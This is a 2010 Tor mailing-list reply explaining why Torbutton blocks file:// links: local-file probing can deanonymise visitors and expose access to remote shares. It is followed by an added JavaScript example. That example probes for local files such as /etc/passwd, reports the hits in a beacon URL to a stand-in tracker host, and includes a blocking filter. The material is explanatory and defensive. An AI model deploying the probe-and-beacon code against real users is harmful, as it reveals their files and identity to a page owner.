--- On Wed, 2/17/10, Jon Cosby <[email protected]> wrote:
>
> I'm referring to links from file:// urls. By default,
> Torbutton blocks this, and has it "recommended."
Ah, you mean the file protocol. Firefox itself tends to have this disabled by
default also. One of the reasons is to prevent malicious users from including
file:// urls in an external webpage. With file:// urls, a webpage could be
designed to test for the existence of local files on your computer. From an
anonymity standpoint, if I can run a test that verifies the existence of a
specific file on your computer, one that I can prove only you would have on
your computer, then I might be able to prove that you loaded my webpage.
I suspect there are also ways to potentially execute some local code on your
computer by accessing local files (depending on the OS, this might be harder or
easier to achieve). If that's the case, perhaps depending on the program, by
executing it locally, I might be able to detect this remotely. Maybe the
program does something as simple as a DNS lookup that I can sniff and then
correlate to you...
And, finally, just because a file is accessed via a file:// url does not mean
it is actually accessing a file locally. It is accessing a file via your local
file system namespace, but this might be on a remotely mounted drive/share
making the remote server able to detect/prove this access, once again, exposing
your access of a webpage by at least the owner of the remote server/share.
I suspect that there are many more attacks based on this, and that I have only
touched the tip of the iceberg... Hope that helps,
-Martin
***********************************************************************
To unsubscribe, send an e-mail to [email protected] with
unsubscribe or-talk in the body. http://archives.seul.org/or/talk/
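The file-existence probe Martin describes, together with the kind of check a Torbutton-style filter applies to refuse it, as an added example in JavaScript. This is not code from the thread, from Torbutton or from Firefox; the candidate paths, the page origins and the beacon host are invented for illustration, and the browser-side probe relies on a `<script>` element's load/error events, whose behaviour for file: URLs varies by browser and settings.

```javascript
// Added example (not from the or-talk thread, Torbutton or Firefox).
// Part 1: how a page served from an http(s) origin could test for local
// files via file:// URLs and report the result to its owner.
// Part 2: the check a Torbutton-style filter applies to refuse such loads.
// All paths, origins and the beacon host are invented (assumptions).

// Candidate files a page might probe for. Hits on common system files only
// narrow the platform; a hit on a file that a single person is known to
// have identifies that person as the one who loaded the page.
const CANDIDATE_FILES = [
  'file:///etc/passwd',                              // almost any Unix host
  'file:///C:/Windows/System32/drivers/etc/hosts',   // almost any Windows host
  'file:///home/alice/projects/secret-plan.txt',     // invented: only one user has it
  'file://fileserver.example/share/alice/notes.txt', // invented remote share
];

// Browser-side probe (never called from Node): a <script src="file://...">
// fires 'load' if the browser fetched the file and 'error' if it could not,
// regardless of whether the content parsed as JavaScript. Whether a browser
// lets an http(s) page load file: URLs at all is exactly what the filter
// below decides.
function scriptProbe(url) {
  return new Promise((resolve) => {
    const s = document.createElement('script');
    s.onload = () => resolve(true);
    s.onerror = () => resolve(false);
    s.src = url;
    document.head.appendChild(s);
  });
}

// Collect the candidates whose probe succeeded. `loaded` is the probe
// function: scriptProbe in a page, a stub in offline use.
function fingerprint(candidates, loaded) {
  return candidates.filter((url) => loaded(url));
}

// Encode the result as one bit per candidate and attach it to a beacon URL
// the page would then request (an <img> or fetch is enough), so the page
// owner learns which files exist on the visitor's machine.
function buildBeacon(beaconBase, candidates, hits) {
  const hit = new Set(hits);
  const bits = candidates.map((url) => (hit.has(url) ? '1' : '0')).join('');
  const beacon = new URL(beaconBase);
  beacon.searchParams.set('f', bits);
  return beacon.toString();
}

// Part 2. Torbutton-style policy: a page that is not itself a file: URL may
// not load or navigate to a file: URL. Relative links are resolved against
// the page first, so only genuine file: targets are refused.
function allowLoad(pageUrl, targetUrl) {
  const page = new URL(pageUrl);
  const target = new URL(targetUrl, pageUrl);
  if (target.protocol !== 'file:') return true;
  return page.protocol === 'file:';
}

// A file: URL with a non-empty host (file://server/share/...) names a
// remote share, so even a "local" read is visible to that server's owner.
function namesRemoteShare(url) {
  const u = new URL(url);
  return u.protocol === 'file:' && u.hostname !== '' && u.hostname !== 'localhost';
}

// Offline demonstration with a constructed stub standing in for the probe.
if (typeof document === 'undefined') {
  const present = new Set(['file:///etc/passwd',
                           'file:///home/alice/projects/secret-plan.txt']);
  const hits = fingerprint(CANDIDATE_FILES, (url) => present.has(url));
  console.log('hits:', hits);
  console.log('beacon:', buildBeacon('https://tracker.example/r', CANDIDATE_FILES, hits));
  console.log('blocked:', !allowLoad('https://tracker.example/page.html', CANDIDATE_FILES[0]));
  console.log('remote share:', CANDIDATE_FILES.filter(namesRemoteShare));
}
```

The policy function is the part worth keeping in mind when deciding whether to relax the Torbutton setting: it permits file: loads only from file: pages, and the remote-share check shows why a file: URL is not automatically a purely local operation.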